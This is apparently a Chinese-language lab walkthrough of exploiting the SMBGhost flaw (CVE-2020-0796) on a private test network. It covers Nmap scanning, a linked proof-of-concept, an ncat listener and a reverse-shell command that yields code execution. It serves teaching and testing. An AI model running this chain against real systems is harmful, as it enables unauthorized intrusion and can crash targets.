*- 受影响版本

启动 Nmap 扫描 DMZ 区域网络
map -sS 192.168.116.0/24
nmap:网络扫描程序名称。
-sS:选择 TCP SYN 扫描方法。在此扫描中,Nmap 向目标主机发送一个 SYN 数据包并观察响应。如果目标主机回复 SYN-ACK 数据包,Nmap 知道该端口是开放的。如果目标主机回复 RST 数据包,则表示该端口已关闭。
192.168.116.0/24:要扫描的特定 IP 地址或地址范围。在此情况下,地址范围为 192.168.116.0/24,描述从 192.168.116.1 到 192.168.116.254 的所有 IP 地址。

=> 观察到 victim 机器的 IP 地址 192.168.116.145 上 445 端口已开放。
· 使用 Nmap 扫描 victim 机器的漏洞
map -p445 –script smb-protocols 192.168.116.145
nmap:网络扫描程序名称。
-p445:指定要扫描的特定端口,这里是端口 445。端口 445 通常用于 Windows 系统上的 SMB(服务器消息块)服务通信。
--script smb-protocols:选择 smb-protocols 脚本执行扫描。此脚本用于检查并显示目标主机上支持的 SMB 协议版本信息。
192.168.116.145:要扫描的目标主机 IP 地址。此处设置为 192.168.116.145。

[]: -https://github.com/ly4k/SMBGhost "利用代码"

=> 结果显示 Vulnerable → 在 victim 机器上发现存在可利用的 CVE-2020-0796 漏洞。
实施 Reverse_shell 攻击
使用 Netcat 启动会话监听 victim 的连接
ncat -lvp 4444
启动 CVE-2020-0796 利用脚本
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "利用代码"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> 结果: 攻击机取得了 victim 机器上 shell 代码的执行权限。

连接成功后,攻击者可以以当前连接会话中的用户权限在 victim 机器上任意执行和利用代码。
会话结束时,victim 机器会蓝屏并自动重启。

执行漏洞利用可能导致目标系统损坏